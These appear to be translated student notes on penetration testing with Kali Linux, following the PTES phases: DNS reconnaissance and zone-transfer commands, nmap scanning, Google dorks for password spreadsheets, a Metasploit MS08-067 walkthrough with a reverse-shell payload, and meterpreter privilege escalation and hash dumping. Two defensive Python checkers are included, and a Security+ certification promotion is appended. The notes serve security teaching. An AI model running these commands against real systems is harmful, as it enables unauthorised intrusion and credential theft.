"Safe Cow Study notes" Kali Linux penetration test method

Source: Internet
Author: User
Tags: domain name server, domain transfer, nslookup, interception, kali linux, owasp zap

1. Root causes of security issues

① Layered thinking: the staff at each layer care only about their own layer's work, so everyone's knowledge of the system is one-sided, while security is all-round and concerns the whole system. This mismatch is where security problems come from.

② Technicians pursue efficiency, so they focus on implementing functionality and easily neglect security in their work.

③ People make mistakes, so the biggest security threat is people. Security hazards cannot be eliminated, only reduced.

Software security life cycle (from requirements and design onward):

Security requirements -> system architecture -> coding specifications -> code audit -> deployment specifications -> environment audit

Forward thinking

Reverse thinking: Penetration Testing

The significance of penetration testing:

1. Security construction (the forward approach):

① long cycle

② large investment

③ effect hard to measure

2. Penetration testing:

① starts from the problem

② hacker's perspective

③ high efficiency

The goal of penetration testing: to achieve security.

Security building

Protective construction: from the defensive angle, it reduces the attack surface but cannot defend comprehensively.

Offensive security: think like an attacker and use attack techniques to detect vulnerabilities in the system so they can be fixed early.

Kali Linux: a Linux distribution based on Debian, formerly known as BackTrack

Includes more than 600 security tools

For penetration testing and safety audits

FHS Standard directory structure

Multi-platform support, including ARM for mobile platforms

Open Source Free

Policies

Root user policy (some tools require root privileges)

Network service policy (all network services are disabled by default and no autostart scripts run; services can be enabled with update-rc.d)

Update and upgrade policy (the base system is maintained by Debian, the tools by the Kali project)

Penetration Testing Execution Standard, PTES (www.pentest-standard.org)

1. Pre-engagement interaction: communicate with the customer, determine the scope of the penetration test, etc.

For example, an application system (such as an e-commerce website); if an application is too large, it is divided into smaller systems.

2. Intelligence gathering: passive information collection such as e-mail addresses and DNS servers, and active information collection such as port scanning and service discovery.

Passive information collection: the tester does not interact directly with the target system or its personnel, but gathers information through third parties.

Domain names (important), mailboxes, people, addresses

– nslookup: nslookup -type=ns baidu.com 8.8.8.8

– dig: dig @8.8.8.8 baidu.com NS

Query the BIND version: dig @dns.baidu.com version.bind txt chaos +noall +answer

Zone transfer: dig @dns.baidu.com baidu.com AXFR

Registration information: whois baidu.com (shows the domain's name servers (NS records), the IP address of each name server, and the registrant's information: name, location, telephone, mailbox, etc.)

Comprehensive tools:

– fierce: fierce -dnsserver 8.8.8.8 -dns baidu.com -wordlist /usr/share/fierce.hosts.txt

/usr/share/fierce.hosts.txt is a locally supplied dictionary; fierce uses it to brute-force the domain's records entry by entry.

– dnsrecon: dnsrecon -d baidu.com -t std --lifetime 10

-t std: specifies the type of enumeration

--lifetime 10: specifies the time-out period
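The dig checks above are also what an administrator runs against their own authoritative servers to confirm that zone transfers are refused and version.bind is not disclosed. The following is an added example, not part of the original notes: it classifies dig's output, and the nameserver and zone names (ns1.example.net, example.net) and the sample outputs are constructed.

```python
"""Classify dig output for an AXFR attempt and a CHAOS-class version.bind query.
Added example (not from the original notes); sample outputs are constructed."""
import re
import subprocess

# A successful transfer starts and ends with the zone's SOA record.
SOA_RE = re.compile(r"^[^;]\S*\s+\d+\s+IN\s+SOA\s", re.MULTILINE)
# A disclosed version looks like a quoted string containing "major.minor".
VERSION_RE = re.compile(r'"[^"]*\d+\.\d+[^"]*"')


def classify_axfr(dig_output: str) -> str:
    """'OPEN' if the server returned zone records, else 'REFUSED'.
    dig prints '; Transfer failed.' both for a refused transfer and for an
    unreachable server; neither leaks the zone, so both count as REFUSED."""
    if "Transfer failed" in dig_output:
        return "REFUSED"
    return "OPEN" if SOA_RE.search(dig_output) else "REFUSED"


def classify_version_bind(short_output: str) -> str:
    """'DISCLOSED' when the TXT answer looks like a software version string."""
    return "DISCLOSED" if VERSION_RE.search(short_output) else "HIDDEN"


def check_nameserver(ns: str, zone: str) -> dict:
    """Live check of one server (needs dig and network access)."""
    axfr = subprocess.run(["dig", f"@{ns}", zone, "AXFR"],
                          capture_output=True, text=True).stdout
    ver = subprocess.run(["dig", f"@{ns}", "version.bind", "txt", "chaos", "+short"],
                         capture_output=True, text=True).stdout
    return {"ns": ns, "axfr": classify_axfr(axfr), "version": classify_version_bind(ver)}


# Constructed sample outputs (not captured from any real server).
SAMPLE_AXFR_REFUSED = "; <<>> DiG 9.18.1 <<>> @ns1.example.net example.net AXFR\n; Transfer failed.\n"
SAMPLE_AXFR_OPEN = (
    "example.net.\t3600\tIN\tSOA\tns1.example.net. hostmaster.example.net. 2024010101 7200 900 1209600 3600\n"
    "www.example.net.\t300\tIN\tA\t192.0.2.10\n"
    "example.net.\t3600\tIN\tSOA\tns1.example.net. hostmaster.example.net. 2024010101 7200 900 1209600 3600\n"
)
SAMPLE_VERSION_SHOWN = '"9.18.1-1ubuntu1"\n'
SAMPLE_VERSION_HIDDEN = '"not currently available"\n'

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print(check_nameserver(sys.argv[1], sys.argv[2]))   # python3 check.py <ns> <zone>
    else:
        print(classify_axfr(SAMPLE_AXFR_OPEN), classify_version_bind(SAMPLE_VERSION_HIDDEN))
```

Run it against every NS record of the zone, since each authoritative server has its own allow-transfer and version settings.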

Search engines

– Shodan (https://www.shodan.io): searches for devices exposed on the Internet, collects information about them, and reveals vulnerabilities in them

– Google

inurl:".php?id="

Search for rack cameras: intitle:"Netbotz appliance" "OK"

filetype:xls "username|password"

Image metadata can reveal information such as the GPS position at the time of shooting.

Custom password dictionary (generated from personal information):

– cupp (not in Kali by default; must be downloaded)

Active information collection

Domain name -> subdomains -> IP addresses -> usually scan the class C segment the IP address belongs to -> view open ports -> service information for the open ports

Examples of nmap use:

Environment: target machine 192.168.1.116

nmap -sS 192.168.1.116 // view open ports and the corresponding services

nmap -p21 -sV 192.168.1.116 // view the service version on port 21 (check whether it is the latest version and, if not, whether it has a known vulnerability)

If you need to scan many network segments and ports, it is best to automate the scan with simple scripts.

Service ports most worth scanning:

SNMP, SMB, SMTP, web
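Once scans are automated across many hosts, the version check from the nmap example above is best done by comparing results with an allow-list of what each host should expose. The following is an added example, not from the original notes: it parses nmap's grepable output (nmap -sV -oG) and reports open ports missing from a per-host baseline; the baseline and the scan lines are constructed samples.

```python
"""Compare nmap grepable output with a per-host allow-list of expected open ports.
Added example (not from the original notes); baseline and scan lines are constructed."""
import re

# Expected exposure per host: the set of "port/proto" allowed to be open.
# Hosts missing from the baseline are treated as "nothing expected".
BASELINE = {"192.168.1.116": {"22/tcp", "80/tcp"}}

# Constructed -oG output (one "Host:" line per target; not a real scan result).
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 192.168.1.116
Host: 192.168.1.116 ()\tStatus: Up
Host: 192.168.1.116 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 7.9p1/, 80/open/tcp//http//Apache httpd 2.4.38/\tIgnored State: closed (997)
# Nmap done
"""

# Grepable port entry layout: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([^/]+)/([^/]+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return {host: [("port/proto", service, version), ...]} for open ports only."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open":
                hosts.setdefault(host, []).append((f"{port}/{proto}", service, version.strip()))
    return hosts


def unexpected_services(scan, baseline):
    """Open ports not on the host's allow-list, as (host, port, service, version) tuples."""
    findings = []
    for host, entries in scan.items():
        allowed = baseline.get(host, set())
        findings.extend((host, port, svc, ver) for port, svc, ver in entries if port not in allowed)
    return findings


if __name__ == "__main__":
    for host, port, svc, ver in unexpected_services(parse_gnmap(SAMPLE_GNMAP), BASELINE):
        print(f"{host} {port} {svc} {ver!r}: not in baseline, check version and necessity")
```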

Identify protection mechanisms:

lbd

wafw00f: identifies the WAF that causes injection tests to fail during web penetration testing

fragroute

nmap

wafw00f -l // list the WAF products wafw00f can detect

Scan a specific website: wafw00f xxxx (URL)

Detect load balancer devices:

lbd www.baidu.com

fragroute: a tool for detecting whether the target system uses IPS/IDS protective devices

3. Threat modeling phase: analyze the collected information to determine the most efficient attack path

Threat modeling is done from the technical black-box point of view, and its results are submitted as part of the penetration test report.

4. Vulnerability analysis phase: review the server software versions and other findings for vulnerabilities, and write targeted exploit code

Vulnerability scanning (only discovers vulnerabilities; does not tell you how to exploit them):

Nessus

OpenVAS

Nexpose

nmap

scripts

Analysis of known vulnerabilities inside Kali:

Exploitation of known vulnerabilities:

Sandi-gui

searchsploit // search whether a piece of software has any known vulnerabilities

Metasploit, Armitage (graphical front end for Metasploit)

Example: searchsploit vsftp

Metasploit (the "M" icon):

msf > use exploit/windows/smb/ms08_067_netapi // exploits a Windows XP vulnerability

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp // the payload makes the target host connect back to the attacker's host after exploitation

msf exploit(ms08_067_netapi) > show options // see what needs to be set

msf exploit(ms08_067_netapi) > set RHOST xxxx (target IP address)

msf exploit(ms08_067_netapi) > set LHOST xxxx (local IP address)

msf exploit(ms08_067_netapi) > exploit (connects to the target if the target host has the vulnerability)

A "meterpreter >" prompt means the target host is connected.

meterpreter > getuid // view the logged-in account

meterpreter > ps // view processes

meterpreter > sysinfo // view system information

meterpreter > getpid // view the ID of the process injected into

meterpreter > getsystem // elevate privileges

meterpreter > hashdump // view local accounts and password hashes

Save the hashdump output to a new file, ready for password cracking

meterpreter > screenshot // screenshot of the target host's desktop

meterpreter > run vnc // view the current active desktop of the host (live interaction)

Web scanning: Nikto, Burp Suite, OWASP ZAP; sqlmap: for SQL injection vulnerabilities

Burp Suite: proxy interception tool

① Change the proxy setting in the browser to point at the Burp Suite proxy

② Wait for Burp Suite to intercept the browser's request to the server, then save the intercepted request to a local file

③ Use sqlmap to check for a SQL injection vulnerability: sqlmap -r burp (the saved file name) --dbs

5. Exploitation phase: protective measures are often encountered here, in which case steps 2 to 4 are repeated

6. Post-exploitation phase: further attacks to obtain more information

7. Penetration test report: how the vulnerabilities were identified, how they were exploited, how to fix them, etc.

Project checklist

Scope of the penetration test

Obtain authorization

Penetration test methods

Whether social engineering is allowed

Whether denial-of-service attacks are allowed

Scanners cannot rule out vulnerabilities at the business logic level, such as users exceeding their permitted privileges

These are student notes from the Safe Cow class; to see this course or other practical information security material, visit the Safe Cow classes.


Security+ certification: why is it the most popular certification of the Internet+ era?

First, a manifesto introducing Security+

Security+ is a vendor-neutral third-party certification issued by CompTIA, the Computing Technology Industry Association of the United States. Together with CISSP and ITIL it is counted among the ten popular certifications of the international IT industry. Whereas CISSP emphasizes information security management, Security+ places more emphasis on information security technology and operations.

The certification demonstrates your ability in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and encryption technology. Because the exam is demanding, the certification carries real weight and has been widely adopted by enterprises and security professionals worldwide.

Why is Security+ certification so hot?

Reason one: among information security certifications, those emphasizing information security technology were missing, and Security+ fills exactly that gap.

The information security certifications currently recognized in the industry are mainly CISP and CISSP, but both emphasize information security management: their technical content is broad but shallow, and the exam reflects that. CISSP requires more than 5 years of information security work experience, and CISP requires a college education plus 4 years of working experience. These requirements block the path of capable and motivated young people. In practice, whether looking for a job, seeking a raise, or naming staff in a bid, certification is essential, which is unfair to young people. Security+ clears these obstacles to career development: because it emphasizes information security technology, it has no special work-experience requirement. Anyone with an IT-related background who wants to progress can study for it and take the exam.

Reason two: a weapon for IT operations and maintenance staff to advance and change roles.

In banking, securities, insurance, and information and communications industries there are many IT operations staff, and operations covers a very wide field: networks, systems, security, application architecture and storage in one integrated technical post. Operations staff may not share the programmer's tragic "born a bachelor, die writing code", but they do know the "hoeing the fields under the noon sun" bitterness of operations work. Facing computers and machines every day, they inevitably grow confused about their career development. The arrival of the international Security+ certification lets ambitious operations staff learn network security knowledge, master network security practice, develop their careers toward network security, and help ease the shortage of information security personnel in China. Even without changing roles, learning security knowledge and obtaining a security certification is essential to doing operations and maintenance well.

Reason three: down to earth, international, easy to take, moderate cost!

As one of the most influential organizations in the global ICT sector, CompTIA is professional, fair and impartial in information security talent certification. Security+ is highly practical and closely tied to the daily work of front-line engineers, making it suitable for IT staff in banks, securities firms, insurance companies, internet companies and similar organizations. As an international certification it is widely recognized in 147 countries around the world.

Under the current wave of information security, talent is the key to its development, and domestic information security personnel are very scarce. I believe Security+ certification will become the most popular information security certification.

This article is from the "11662938" blog; please keep this source: http://11672938.blog.51cto.com/11662938/1980330
